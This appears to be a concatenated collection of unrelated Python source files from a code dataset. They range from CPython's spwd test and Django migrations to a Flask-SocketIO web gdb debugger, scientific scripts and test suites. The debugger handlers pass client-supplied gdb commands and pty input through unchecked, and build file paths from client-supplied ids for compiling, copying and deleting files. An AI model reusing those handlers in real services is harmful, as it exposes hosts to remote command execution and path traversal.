K = np.array([30.0, 70.0])
X = np.array([10, 0.0])
sys = signal.StateSpace(A-B*K, B, C, D)
t, y = signal.step(sys, X0=X)
plt.plot(t, y, 'b--', label="State Space")
plt.show()
| StarcoderdataPython |
3217460 | <filename>Lib/test/test_spwd.py
import os
import unittest
from test import support
spwd = support.import_module('spwd')
@unittest.skipUnless(hasattr(os, 'geteuid') and os.geteuid() == 0,
'root privileges required')
class TestSpwdRoot(unittest.TestCase):
def test_getspall(self):
entries = spwd.getspall()
self.assertIsInstance(entries, list)
for entry in entries:
self.assertIsInstance(entry, spwd.struct_spwd)
def test_getspnam(self):
entries = spwd.getspall()
if not entries:
self.skipTest('empty shadow password database')
random_name = entries[0].sp_namp
entry = spwd.getspnam(random_name)
self.assertIsInstance(entry, spwd.struct_spwd)
self.assertEqual(entry.sp_namp, random_name)
self.assertEqual(entry.sp_namp, entry[0])
self.assertEqual(entry.sp_namp, entry.sp_nam)
self.assertIsInstance(entry.sp_pwdp, str)
self.assertEqual(entry.sp_pwdp, entry[1])
self.assertEqual(entry.sp_pwdp, entry.sp_pwd)
self.assertIsInstance(entry.sp_lstchg, int)
self.assertEqual(entry.sp_lstchg, entry[2])
self.assertIsInstance(entry.sp_min, int)
self.assertEqual(entry.sp_min, entry[3])
self.assertIsInstance(entry.sp_max, int)
self.assertEqual(entry.sp_max, entry[4])
self.assertIsInstance(entry.sp_warn, int)
self.assertEqual(entry.sp_warn, entry[5])
self.assertIsInstance(entry.sp_inact, int)
self.assertEqual(entry.sp_inact, entry[6])
self.assertIsInstance(entry.sp_expire, int)
self.assertEqual(entry.sp_expire, entry[7])
self.assertIsInstance(entry.sp_flag, int)
self.assertEqual(entry.sp_flag, entry[8])
with self.assertRaises(KeyError) as cx:
spwd.getspnam('invalid user name')
self.assertEqual(str(cx.exception), "'getspnam(): name not found'")
self.assertRaises(TypeError, spwd.getspnam)
self.assertRaises(TypeError, spwd.getspnam, 0)
self.assertRaises(TypeError, spwd.getspnam, random_name, 0)
try:
bytes_name = os.fsencode(random_name)
except UnicodeEncodeError:
pass
else:
self.assertRaises(TypeError, spwd.getspnam, bytes_name)
@unittest.skipUnless(hasattr(os, 'geteuid') and os.geteuid() != 0,
'non-root user required')
class TestSpwdNonRoot(unittest.TestCase):
def test_getspnam_exception(self):
name = 'bin'
try:
with self.assertRaises(PermissionError) as cm:
spwd.getspnam(name)
except KeyError as exc:
self.skipTest("spwd entry %r doesn't exist: %s" % (name, exc))
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
3386230 | <filename>gandalf/api/auth.py<gh_stars>0
from flask import Blueprint
from flask_restful import Resource, Api
auth_blueprint = Blueprint("auth", __name__, url_prefix="/auth")
api = Api(auth_blueprint)
class AuthPing(Resource):
def get(self):
return {"status": "success", "message": "pong!"}
api.add_resource(AuthPing, "/ping")
| StarcoderdataPython |
3386941 | import traceback
from flask import Flask, redirect, request, render_template, session , url_for, jsonify
from flask_socketio import SocketIO, emit
from flask_compress import Compress
import os
from utils import *
ResponseThread = None
app = Flask(__name__)
app.app_context().push()
websocket = SocketIO(app)
app.config["socket"] = websocket
import config
from db import User , Example,db
from checklogin import login
from mainpage import main
app.register_blueprint(login)
app.register_blueprint(main)
Compress(app)
manager = app.config["manager"]
@websocket.on("connect",namespace="/gdb_listener")
def connect_handler():
desired_gdbpid = int(request.args.get("gdbpid", 0))
try:
if desired_gdbpid:
debug_session = manager.connect_client_to_debug_session(
desired_gdbpid=desired_gdbpid, client_id=request.sid
)
emit(
"debug_session_connection_event",
{
"ok": True,
"started_new_gdb_process": False,
"pid": debug_session.pid,
"message": f"Connected to existing gdb process {desired_gdbpid}",
},
)
else:
gdb_command = request.args.get("gdb_command", app.config["gdb_command"])
mi_version = request.args.get("mi_version", "mi2")
debug_session = manager.add_new_debug_session(
gdb_command=gdb_command, mi_version=mi_version, client_id=request.sid
)
emit(
"debug_session_connection_event",
{
"ok": True,
"started_new_gdb_process": True,
"message": f"Started new gdb process, pid {debug_session.pid}",
"pid": debug_session.pid,
},
)
except Exception as e:
emit(
"debug_session_connection_event",
{"message": f"Failed to establish gdb session: {e}", "ok": False},
)
if manager.gdb_reader_thread is None:
manager.gdb_reader_thread = websocket.start_background_task(
target=read_and_forward_gdb_and_pty_output
)
logging.info("Created background thread to read gdb responses")
@websocket.on("set_dir",namespace="/gdb_listener")
def set_dir(data):
id = data["id"]
path = os.path.join(app.config["STORE_PATH"],id)
client_id = request.sid
debug_session = manager.debug_session_from_client_id(client_id)
if not debug_session:
emit("error_running_gdb_command", {"message": "no session"})
return
pty_mi = debug_session.pygdbmi_controller
if pty_mi is not None:
try:
cmds = [f"00-environment-cd {path}"]
for cmd in cmds:
pty_mi.write(
cmd + "\n",
timeout_sec=0,
raise_error_on_timeout=False,
read_response=False,
)
except Exception:
err = traceback.format_exc()
logging.error(err)
emit("error_running_gdb_command", {"message": err})
else:
emit("error_running_gdb_command", {"message": "gdb is not running"})
@websocket.on("pty_interaction", namespace="/gdb_listener")
def pty_interaction(message):
debug_session = manager.debug_session_from_client_id(request.sid)
if not debug_session:
emit(
"error_running_gdb_command",
{"message": f"no gdb session available for client id {request.sid}"},
)
return
try:
data = message.get("data")
print(data)
pty_name = data.get("pty_name")
if pty_name == "user_pty":
pty = debug_session.pty_for_gdb
elif pty_name == "program_pty":
pty = debug_session.pty_for_debugged_program
else:
raise ValueError(f"Unknown pty: {pty_name}")
action = data.get("action")
if action == "write":
key = data["key"]
pty.write(key)
elif action == "set_winsize":
pty.set_winsize(data["rows"], data["cols"])
else:
raise ValueError(f"Unknown action {action}")
except Exception:
err = traceback.format_exc()
logging.error(err)
emit("error_running_gdb_command", {"message": err})
@websocket.on("run_gdb_command", namespace="/gdb_listener")
def run_gdb_command(message):
client_id = request.sid
debug_session = manager.debug_session_from_client_id(client_id)
if not debug_session:
emit("error_running_gdb_command", {"message": "no session"})
return
pty_mi = debug_session.pygdbmi_controller
if pty_mi is not None:
try:
cmds = message["cmd"]
print(cmds)
for cmd in cmds:
pty_mi.write(
cmd + "\n",
timeout_sec=0,
raise_error_on_timeout=False,
read_response=False,
)
except Exception:
err = traceback.format_exc()
logging.error(err)
emit("error_running_gdb_command", {"message": err})
else:
emit("error_running_gdb_command", {"message": "gdb is not running"})
@websocket.on("disconnect", namespace="/gdb_listener")
def client_disconnected():
"""do nothing if client disconnects"""
manager.disconnect_client(request.sid)
logging.info("Client websocket disconnected, id %s" % (request.sid))
def read_and_forward_gdb_and_pty_output():
while True:
websocket.sleep(0.05)
debug_sessions_to_remove = []
for debug_session, client_ids in manager.debug_session_to_client_ids.items():
try:
try:
response = debug_session.pygdbmi_controller.get_gdb_response(
timeout_sec=0, raise_error_on_timeout=False
)
except Exception:
response = None
send_msg_to_clients(
client_ids,
"The underlying gdb process has been killed. This tab will no longer function as expected.",
error=True,
)
debug_sessions_to_remove.append(debug_session)
if response:
for client_id in client_ids:
logging.info(
"emiting message to websocket client id " + client_id
)
websocket.emit(
"gdb_response",
response,
namespace="/gdb_listener",
room=client_id,
)
else:
# there was no queued response from gdb, not a problem
pass
except Exception:
logging.error("caught exception, continuing:" + traceback.format_exc())
debug_sessions_to_remove += check_and_forward_pty_output()
for debug_session in set(debug_sessions_to_remove):
manager.remove_debug_session(debug_session)
def check_and_forward_pty_output():
debug_sessions_to_remove = []
for debug_session, client_ids in manager.debug_session_to_client_ids.items():
try:
response = debug_session.pty_for_gdb.read()
if response is not None:
for client_id in client_ids:
websocket.emit(
"user_pty_response",
response,
namespace="/gdb_listener",
room=client_id,
)
response = debug_session.pty_for_debugged_program.read()
if response is not None:
for client_id in client_ids:
websocket.emit(
"program_pty_response",
response,
namespace="/gdb_listener",
room=client_id,
)
except Exception as e:
debug_sessions_to_remove.append(debug_session)
for client_id in client_ids:
websocket.emit(
"fatal_server_error",
{"message": str(e)},
namespace="/gdb_listener",
room=client_id,
)
logging.error(e, exc_info=True)
return debug_sessions_to_remove
def send_msg_to_clients(client_ids, msg, error=False):
if error:
stream = "stderr"
else:
stream = "stdout"
response = [{"message": None, "type": "console", "payload": msg, "stream": stream}]
for client_id in client_ids:
logging.info("emiting message to websocket client id " + client_id)
websocket.emit(
"gdb_response", response, namespace="/gdb_listener", room=client_id
)
@websocket.on("compile",namespace="/gdb_listener")
def compile_handler(data):
id = data["id"]
path = os.path.join(app.config["STORE_PATH"],id)
purepath = Path(path)
for x in purepath.iterdir():
if x.is_file() and (x.suffix == ".out" or x.suffix==".o"):
os.remove(x.as_posix())
os.chdir(path)
cmd = f"gcc -fno-stack-protector -g -c *.c "
cmd += f"2>out 1>/dev/null"
print(cmd)
os.system(cmd)
f = open(f"out", "r")
data = f.read(20480)
f.close()
if data:
emit("compile", {
"status": False,
"err": data
})
return
cmd = "ld -r *.o -o a.o "
cmd += f" 2>out 1>/dev/null"
os.system(cmd)
f = open(f"out", "r")
data = f.read(20480)
f.close()
if data:
emit("compile", {
"status": False,
"err": data
})
return
cmd = "gcc -g -fno-stack-protector a.o "
cmd += f"2>out 1>/dev/null"
os.system(cmd)
f = open(f"out", "r")
data = f.read(20480)
f.close()
if data:
emit("compile", {
"status": False,
"err": data
})
return
for x in purepath.iterdir():
if x.is_file() and x.suffix == ".out":
emit("compile", {
"status": True
})
return
emit("compile", {
"status": False,
"err": data
})
@websocket.on("public_example",namespace="/gdb_listener")
def public_example(data):
data = data["data"]
id = data["id"]
author = data["author"]
name = data["name"]
description = data["description"]
path = app.config["EXAMPLE_PATH"]
example_path = os.path.join(path,id)
cur_path = os.path.join(app.config["STORE_PATH"],id)
out_path = os.path.join(cur_path,"a.out")
print(out_path)
if(not os.path.exists(out_path)):
emit("public_example_response",{
"status":False,
"err":f"This example is not compiled"
})
return
if(Example.find(name,id)):
print(name,id)
print(Example.find(name,id))
emit("public_example_response",{
"status":False,
"err":f"an example named {name} is already existed!"
})
return
if(not os.path.exists(example_path)):
make_dir(example_path)
name_path = os.path.join(example_path,name)
description_path = os.path.join(name_path,"description")
author_path = os.path.join(name_path,"author")
if(os.path.exists(name_path)):
shutil.rmtree(name_path)
os.mkdir(name_path)
else:
os.mkdir(name_path)
mk_write_file(description_path,description)
mk_write_file(author_path,author)
copy_search_file(cur_path,name_path)
Example.add(id,name,description,name_path)
emit("public_example_response",{
"status":True,
"err":f""
})
@websocket.on("get_example_list",namespace="/gdb_listener")
def get_example_list():
all_example = Example.query.all()
example_list = []
for example in all_example:
example_list.append(f"{example.id} {example.name} {example.description}")
emit("example_list",{
"list":example_list
})
@websocket.on("get_path",namespace="/gdb_listener")
def get_path(data):
author_id = data["author_id"]
id = data["id"]
name = data["name"]
path =os.path.join( app.config["EXAMPLE_PATH"],author_id)
path =os.path.join( path,name)
file_tree={}
file_path=[]
get_file(path,file_tree,file_path)
cur_path = os.path.join(app.config["STORE_PATH"],id)
clear_dir(cur_path)
copy_search_file(path,cur_path)
emit("get_path_response",{
"path":file_path
})
@websocket.on("get_my_public",namespace="/gdb_listener")
def get_my_public(data):
author_id = data["id"]
all_example = Example.find_by_id(author_id)
example_list = []
for example in all_example:
example_list.append(f"{example.id} {example.name} {example.description}")
emit("get_my_public_response",{
"list":example_list
})
@websocket.on("delete_my_public",namespace="/gdb_listener")
def delete_my_public(data):
author_id = data["id"]
name = data["name"]
find = Example.find(name,author_id)
try:
if(isinstance(find,list)):
for fi in find:
shutil.rmtree(fi.dir_path)
db.session.delete(fi)
db.session.commit()
except AttributeError:
emit("delete_my_public_response",{
"status":False
})
return
emit("delete_my_public_response",{
"status":True
})
@websocket.on("line_change",namespace="/gdb_listener")
def line_change(data):
file = data["file"]
id = data["id"]
start = data["start"]
num = data["num"]
file_path = os.path.join(app.config["STORE_PATH"],id)
file_path = Path(file_path)
fs = [x for x in file_path.iterdir() if x.is_file() and x.suffix==".asset"]
for f in fs:
pos = f.stem.find(file)
if(pos==-1):
continue
line = int(f.stem[pos+len(file):])
if(line>start):
os.rename(f.as_posix(),os.path.join(file_path.as_posix(),f"{file}{line+num}.asset"))
os.rename(os.path.join(file_path.as_posix(),f"{file}{line}.des"),os.path.join(file_path.as_posix(),f"{file}{line+num}.des"))
@websocket.on("delete_attachment",namespace="/gdb_listener")
def delete_attachment(data):
id =data["id"]
name = data["name"]
file_path = os.path.join(app.config["STORE_PATH"],id)
os.remove(os.path.join(file_path,f"{name}.asset"))
os.remove(os.path.join(file_path,f"{name}.des"))
emit("delete_attachment_response",{
"status":True
})
if __name__ == '__main__':
db.create_all()
# User.add("0","0","swj","<EMAIL>")
websocket.run(app, "0.0.0.0",debug=False)
| StarcoderdataPython |
46743 | sessions = [{
"1": {
"type": "session",
"source": {"id": "scope"},
"id": "1",
'profile': {"id": "1"}
}
}]
profiles = [
{"1": {'id': "1", "traits": {}}},
{"2": {'id': "2", "traits": {}}},
]
class MockStorageCrud:
def __init__(self, index, domain_class_ref, entity):
self.index = index
self.domain_class_ref = domain_class_ref
self.entity = entity
if index == 'session':
self.data = sessions
elif index == 'profile':
self.data = profiles
async def load(self):
for item in self.data:
if self.entity.id in item:
return self.domain_class_ref(**item[self.entity.id])
return None
async def save(self):
self.data.append({self.entity.id: self.entity.dict(exclude_unset=True)})
async def delete(self):
del(self.data[self.entity.id])
class EntityStorageCrud:
def __init__(self, index, entity):
self.index = index
self.entity = entity
if index == 'session':
self.data = sessions
elif index == 'profile':
self.data = profiles
async def load(self, domain_class_ref):
for item in self.data:
if self.entity.id in item:
return domain_class_ref(**item[self.entity.id])
return None
async def save(self):
self.data.append({self.entity.id: self.entity.dict(exclude_unset=True)})
async def delete(self):
del(self.data[self.entity.id])
| StarcoderdataPython |
3210166 | <filename>website_multi_company/tests/test_create.py
# Copyright 2018 <NAME> <https://it-projects.info/team/yelizariev>
# License MIT (https://opensource.org/licenses/MIT).
from odoo.tests.common import TransactionCase
class TestCreate(TransactionCase):
at_install = True
post_install = True
def test_create_partner(self):
company = self.env["res.company"].create({"name": "Non default Company"})
website = self.env.ref("website.website2")
website.company_id = company
Partner = self.env["res.partner"].with_context(website_id=website.id)
p = Partner.create({"name": "Test"})
# Default value in res.partner is computed via env['res.company']._company_default_get
# _company_default_get is computed via env['res.users']._get_company()
# _get_company is redefined in website_multi_company to use website_id from context
self.assertEqual(
p.company_id.id,
company.id,
"Partner creation ignore current website from context",
)
| StarcoderdataPython |
145611 | <filename>courses/migrations/0001_initial.py
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-03-03 15:51
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Course',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('edx_course_key', models.CharField(blank=True, max_length=255, null=True)),
('enrollment_start', models.DateTimeField(blank=True, null=True)),
('start_date', models.DateTimeField(blank=True, null=True)),
('enrollment_url', models.URLField(blank=True, null=True)),
('prerequisites', models.TextField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Program',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('live', models.BooleanField(default=False)),
],
),
migrations.AddField(
model_name='course',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='courses.Program'),
),
]
| StarcoderdataPython |
182546 | # Copyright 2018 Owkin, inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from .users.bootstrap_admin import bootstrap_admin
from .users.admin import admin
from orderer.orderers.orderer1 import orderer1
SUBSTRA_PATH = os.getenv('SUBSTRA_PATH', '/substra')
orderer = {
'type': 'orderer',
'name': 'orderer',
'mspid': 'ordererMSP',
'broadcast_dir': {
'external': f'{SUBSTRA_PATH}/data/log/broadcast',
'internal': '/etc/hyperledger/fabric/broadcast'
},
'tls': {
# careful, `ca-cert.pem` is the default cert name file and a
# example file with this name is already present in the docker
# image, do not forget to remove these examples files in your
# docker CMD overriding if naming the same way
'certfile': {
'external': f'{SUBSTRA_PATH}/data/orgs/orderer/tls-ca-cert.pem',
'internal': '/etc/hyperledger/fabric/ca/tls-ca-cert.pem'
},
'clientkey': ''
},
'ca': {
'name': 'rca-orderer',
'host': 'rca-orderer',
'certfile': {
'external': f'{SUBSTRA_PATH}/data/orgs/orderer/ca-cert.pem',
'internal': '/etc/hyperledger/fabric/ca/ca-cert.pem'
},
'keyfile': {
'external': f'{SUBSTRA_PATH}/data/orgs/orderer/ca-key.pem',
'internal': '/etc/hyperledger/fabric/ca/ca-key.pem'
},
'port': {
'internal': 7054,
'external': 9054
},
'url': 'https://rca-orderer:7054',
'logfile': f'{SUBSTRA_PATH}/data/log/rca-orderer.log',
'server-config-path': f'{SUBSTRA_PATH}/conf/orderer/fabric-ca-server-config.yaml',
'client-config-path': f'{SUBSTRA_PATH}/conf/orderer/fabric-ca-client-config.yaml',
'affiliations': {
'owkin': ['paris']
},
'users': {
'bootstrap_admin': bootstrap_admin,
},
},
'users': {
'admin': admin,
},
'csr': {
'cn': 'rca-orderer',
# The "hosts" value is a list of the domain names which the certificate should be valid for.
'hosts': ['rca-orderer'],
'names': [
{'C': 'FR',
'ST': 'Ile-de-France',
'L': 'Paris',
'O': 'owkin',
'OU': None}
],
},
'core_dir': {
'internal': '/etc/hyperledger/fabric',
},
'orderers': [orderer1],
}
| StarcoderdataPython |
140757 | """The tests for deCONZ logbook."""
from copy import deepcopy
from homeassistant.components import logbook
from homeassistant.components.deconz.deconz_event import CONF_DECONZ_EVENT
from homeassistant.components.deconz.gateway import get_gateway_from_config_entry
from homeassistant.const import CONF_DEVICE_ID, CONF_EVENT, CONF_ID, CONF_UNIQUE_ID
from homeassistant.setup import async_setup_component
from .test_gateway import DECONZ_WEB_REQUEST, setup_deconz_integration
from tests.components.logbook.test_init import MockLazyEventPartialState
async def test_humanifying_deconz_event(hass):
"""Test humanifying deCONZ event."""
data = deepcopy(DECONZ_WEB_REQUEST)
data["sensors"] = {
"0": {
"id": "Switch 1 id",
"name": "Switch 1",
"type": "ZHASwitch",
"state": {"buttonevent": 1000},
"config": {},
"uniqueid": "00:00:00:00:00:00:00:01-00",
},
"1": {
"id": "Hue remote id",
"name": "Hue remote",
"type": "ZHASwitch",
"modelid": "RWL021",
"state": {"buttonevent": 1000},
"config": {},
"uniqueid": "0fc00:db20:35b:7399::5-00",
},
}
config_entry = await setup_deconz_integration(hass, get_state_response=data)
gateway = get_gateway_from_config_entry(hass, config_entry)
hass.config.components.add("recorder")
assert await async_setup_component(hass, "logbook", {})
entity_attr_cache = logbook.EntityAttributeCache(hass)
events = list(
logbook.humanify(
hass,
[
MockLazyEventPartialState(
CONF_DECONZ_EVENT,
{
CONF_DEVICE_ID: gateway.events[0].device_id,
CONF_EVENT: 2000,
CONF_ID: gateway.events[0].event_id,
CONF_UNIQUE_ID: gateway.events[0].serial,
},
),
MockLazyEventPartialState(
CONF_DECONZ_EVENT,
{
CONF_DEVICE_ID: gateway.events[1].device_id,
CONF_EVENT: 2001,
CONF_ID: gateway.events[1].event_id,
CONF_UNIQUE_ID: gateway.events[1].serial,
},
),
],
entity_attr_cache,
{},
)
)
assert events[0]["name"] == "Switch 1"
assert events[0]["domain"] == "deconz"
assert events[0]["message"] == "fired event '2000'."
assert events[1]["name"] == "Hue remote"
assert events[1]["domain"] == "deconz"
assert events[1]["message"] == "'Long press' event for 'Dim up' was fired."
| StarcoderdataPython |
3377954 | <filename>functions_legacy/FactorAnalysis.py<gh_stars>1-10
import matplotlib.pyplot as plt
import numpy as np
from numpy import sum as npsum
from numpy import zeros, sort, diag, eye, abs, sqrt, tile, maximum, argsort, max as npmax
from numpy.linalg import eig, matrix_rank
plt.style.use('seaborn')
from functions_legacy.ConditionalPC import ConditionalPC
def FactorAnalysis(c2,d,k_):
# This function computes the Low Rank Diagonal Conditional Correlation
# INPUT:
# c2 :[matrix](n_ x n_) correlation matrix
# d :[matrix](m_ x n_) matrix of constraints
# k_ :[scalar] rank of matrix beta.
# OP:
# c2_LRD :[matrix](n_ x n_) shrunk matrix of the form [email protected]+I-diag([email protected]) where beta is a n_ x k_ matrix
# beta :[matrix](n_ x k_) low rank matrix: n_ x k_
# iter :[scalar] number of iterations
# constraint :[scalar] boolean indicator, it is equal to 1 in case the constraint is satisfied, i.e. d@beta = 0
# For details on the exercise, see here .
## Code
CONDITIONAL=1
if npsum(abs(d.flatten()))==0:
CONDITIONAL=0
n_ = c2.shape[0]
if k_ > n_-matrix_rank(d):
raise Warning('k_ has to be <= rho.shape[0]-rank[d]')
NmaxIter = 1000
eps1 = 1e-9
eta = 0.01
gamma = 0.1
constraint = 0
#initialize output
c2_LRD = c2
dist = zeros
iter = 0
#0. Initialize
Diag_lambda2, e = eig(c2)
lambda2 = Diag_lambda2
lambda2_ord, order = sort(lambda2)[::-1], argsort(lambda2)[::-1]
lam = np.real(sqrt(lambda2_ord[:k_]))
e_ord = e[:, order]
beta = np.real(e_ord[:n_,:k_]@np.diagflat(maximum(lam,eps1)))
c = c2
for j in range(NmaxIter):
#1. Conditional PC
a = c-eye(n_)+np.diagflat(diag([email protected]))
if CONDITIONAL==1:
lambda2, E = ConditionalPC(a, d)
lambda2 = lambda2[:k_]
E = E[:,:k_]
lam = sqrt(lambda2)
else:
#if there aren't constraints: standard PC using the covariance matrix
Diag_lambda2, e = eig(a)
lambda2 = Diag_lambda2
lambda2_ord, order = sort(lambda2)[::-1], argsort(lambda2)[::-1]
e_ord = e[:, order]
E = e_ord[:,:k_]
lam = sqrt(lambda2_ord[:k_])
#2.loadings
beta_new = [email protected](maximum(lam,eps1))
#3. Rows length
l_n = sqrt(npsum(beta_new**2,1))
#4. Rows scaling
beta_new[l_n > 1,:] = beta_new[l_n > 1,:]/tile(l_n[l_n > 1,np.newaxis]*(1+gamma),(1,k_))
#5. reconstruction
c = beta_new@beta_new.T+eye(n_,n_)-diag(diag(beta_new@beta_new.T))
#6. check for convergence
distance = 1/n_*npsum(sqrt(npsum((beta_new-beta)**2,1)))
if distance <= eta:
c2_LRD = c
dist = distance
iter = j
beta = beta_new.copy()
if d.shape == (1,1):
tol = npmax(abs(d*beta))
else:
tol = npmax(abs(d.dot(beta)))
if tol < 1e-9:
constraint = 1
break
else:
beta = beta_new.copy()
beta = np.real(beta)
c2_LRD = np.real(c2_LRD)
c2_LRD = (c2_LRD+c2_LRD.T)/2
return c2_LRD, beta, dist, iter, constraint
| StarcoderdataPython |
107247 | #!/usr/bin/python
# script preparing tab file to plot in R for small RNA profiling
# version 1 29-1-2012
# Usage plotter.py <bowtie input> <min size> <max size> <normalization factor> <tabular output>
import sys
def acquisition (file2parse, sizerange):
F = open (file2parse)
plus_table = {}
minus_table = {}
for line in F:
field = line.split()
coordinate = int( field[3] )
strand = field[1]
sequence = field[4]
size = len (sequence )
if strand == "+" and size in sizerange:
plus_table[coordinate] = plus_table.get(coordinate, 0) + 1
if strand == "-" and size in sizerange:
coordinate = coordinate + size -1 # 23-11-2012 : this line was missing ! it is a BUG that probably altered the Nature maps :-((
minus_table[coordinate] = minus_table.get(coordinate, 0) + 1
return plus_table, minus_table
def output_table (plus_table, minus_table, Nfactor, output):
Nfactor = float(Nfactor)
plus_coordinates = set( plus_table.keys() )
minus_coordinates = set( minus_table.keys() )
coords = sorted (plus_coordinates.union (minus_coordinates) )
## added 23-2-2013 to have, instead, exaustive coordinates
## coords = range (min(coords), max(coords) + 1)
##
OUT = open (output, "w")
print >> OUT, "coord\tplus\tminus"
for coordinate in coords :
print >> OUT, "%s\t%s\t%s" % ( coordinate, plus_table.get(coordinate, 0)*Nfactor, - minus_table.get(coordinate, 0)*Nfactor )
def sizing (minsize, maxsize) :
size_range = range ( int (minsize), int (maxsize) + 1 )
return size_range
plus_table, minus_table = acquisition (sys.argv[1], sizing ( sys.argv[2], sys.argv[3] ) )
output_table ( plus_table, minus_table, sys.argv[4], sys.argv[5] )
| StarcoderdataPython |
3282783 | import os
import jinja2
import reconcile.templates as templates
def get_package_environment():
"""Loads templates from the current Python package"""
templates_dir = os.path.dirname(templates.__file__)
template_loader = jinja2.FileSystemLoader(searchpath=templates_dir)
return jinja2.Environment(loader=template_loader)
| StarcoderdataPython |
1651153 | import subprocess as sp
import torch as th
def run_bench(name, *args, device="cpu"):
args = list(args)
args += ["-d", device]
if device == "cuda" and not th.cuda.is_available():
return "Not available /!\\"
return sp.check_output(["python3", "-m", f"bench.{name}"] + args).decode('utf8')
def main():
template = f"""\
## Benchmarking and verification of Julius
In order to verify the correctness and speed of the implementations in Julius,
we compare ourselves to different reference implementations, comparing speed and
checking how far we are.
### ResampleFrac
We compare `julius.resample` to `resampy`, on an input of size (32, 8 * 44100),
i.e. a batch of size 16 of 8 second of audio at 44.1kHz.
We use the same number of zero crossing as `resampy` for this benchmark.
The small delta is probably
due to the different window function used.
On CPU we have:
{run_bench('resample')}
On GPU we have:
{run_bench('resample', device='cuda')}
### FFTConv1d
We compare to `pytorch.nn.functional.conv1d`, on a input of size [32, 32, 10240],
for a convolution with 32 input channels, 64 output channels and various kernel sizes.
On CPU we have:
{run_bench('fftconv')}
On GPU we have:
{run_bench('fftconv', device='cuda')}
### LowPassFilter
We do not compare to anything, but measure the attenuation in dB of a pure tone
at `0.9 * cutoff`, at the `cutoff`, and at `1.1 * cutoff`.
Note that our implementation automatically choses to use FFTConv1d or not when appropriate.
On CPU we have:
{run_bench('lowpass')}
On GPU we have:
{run_bench('lowpass', device='cuda')}
"""
print(template)
if __name__ == "__main__":
main()
| StarcoderdataPython |
71437 | <gh_stars>0
# Author: <NAME>
# Date: 2015
"""
Visualize the generated localization synthetic
data stored in h5 data-bases
"""
from __future__ import division
import io
import os
import os.path as osp
import numpy as np
import matplotlib.pyplot as plt
import h5py
from common import *
import string
import random
from PIL import Image
OUT_FOLD = 'output'
anno_fold = 'annotations'
img_fold = 'images'
def id_generator(size=8, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def save_textbb(fid, out_fold ,text_im, charBB_list, wordBB, txt, alpha=1.0):
"""
text_im : image containing text
charBB_list : list of 2x4xn_i bounding-box matrices
wordBB : 2x4xm matrix of word coordinates
"""
image = Image.fromarray(np.uint8(text_im))
sfp = os.path.join(OUT_FOLD, img_fold)
image.save(os.path.join(sfp, fid+'.jpg'))
H,W = text_im.shape[:2]
txt_out = []
for t in txt:
txt_out += t.decode('utf-8').split()
dimset = []
# plot the word-BB:
for i in range(wordBB.shape[-1]):
bb = wordBB[:,:,i]
bb = np.c_[bb,bb[:,0]]
# visualize the indiv vertices:
xyset = []
for j in range(4):
xyset.append(int(bb[0,j]))
xyset.append(int(bb[1,j]))
dimset.append(xyset)
fp = os.path.join(OUT_FOLD, anno_fold)
afp = os.path.join(fp, fid + '.txt')
with open(afp, 'w') as f:
assert len(txt_out) == len(dimset)
for i in range(len(txt_out)):
str_out = ','.join(str(x) for x in dimset[i])
str_out += ',' + txt_out[i]
f.write('{}\n'.format(str_out))
def main(db_fname, OUT_FOLD):
db = h5py.File(db_fname, 'r')
dsets = sorted(db['data'].keys())
print("total number of images : ", colorize(Color.RED, len(dsets), highlight=True))
for k in dsets:
rgb = db['data'][k][...]
charBB = db['data'][k].attrs['charBB']
wordBB = db['data'][k].attrs['wordBB']
txt = db['data'][k].attrs['txt']
fid = id_generator()
save_textbb(fid, OUT_FOLD, rgb, [charBB], wordBB, txt)
print("image name : ", colorize(Color.RED, k, bold=True))
print(" ** no. of chars : ", colorize(Color.YELLOW, charBB.shape[-1]))
print(" ** no. of words : ", colorize(Color.YELLOW, wordBB.shape[-1]))
print(" ** text : ", colorize(Color.GREEN, txt))
db.close()
if __name__=='__main__':
if not os.path.exists(OUT_FOLD):
os.makedirs(OUT_FOLD)
if not os.path.exists(os.path.join(OUT_FOLD, anno_fold)):
os.makedirs(os.path.join(OUT_FOLD, anno_fold))
os.makedirs(os.path.join(OUT_FOLD, img_fold))
main('results/SynthText.h5', OUT_FOLD)
| StarcoderdataPython |
1657579 |
import datetime
import logging
import mock
import os
import shutil
import socket
import tempfile
import unittest
from lib.purge_remote_folder import PurgeRemoteFolders
class TestPurgeRemoteFolders(unittest.TestCase):
@staticmethod
def _to_unix_timestamp(date_obj):
return (date_obj - datetime.date(1970, 1, 1)).total_seconds()
def setUp(self):
self.age_in_days = 30
self.dryrun = True
self.directory = tempfile.mkdtemp()
self.files = [
os.path.basename(tempfile.mkstemp(prefix=name, dir=self.directory)[1]) for name in [
"too_old", "too_new", "KEEP_"]]
for tfile in self.files:
atime = self._to_unix_timestamp(datetime.date.today())
mtime = atime if tfile.startswith("too_new") else \
self._to_unix_timestamp(datetime.date.today() - datetime.timedelta(days=(self.age_in_days + 1)))
os.utime(os.path.join(self.directory, tfile), (atime, mtime))
self.execution_id = "this-is-an-execution-id"
self.action = self.get_instance(
os.path.basename(self.directory), self.age_in_days, self.dryrun, self.execution_id)
self.action.archive_base_dir = self.directory
def get_instance(self, *args):
inst = PurgeRemoteFolders(*args)
inst.log = mock.MagicMock(spec=logging.Logger)
return inst
def tearDown(self):
shutil.rmtree(self.directory, ignore_errors=True)
def test_sanitize_path(self):
root_dir = os.path.join("/path", "to", "root")
abs_path = os.path.join("/this", "is", "an", "absolute", "path")
escape_path = os.path.join("..", "some", "other", "dir")
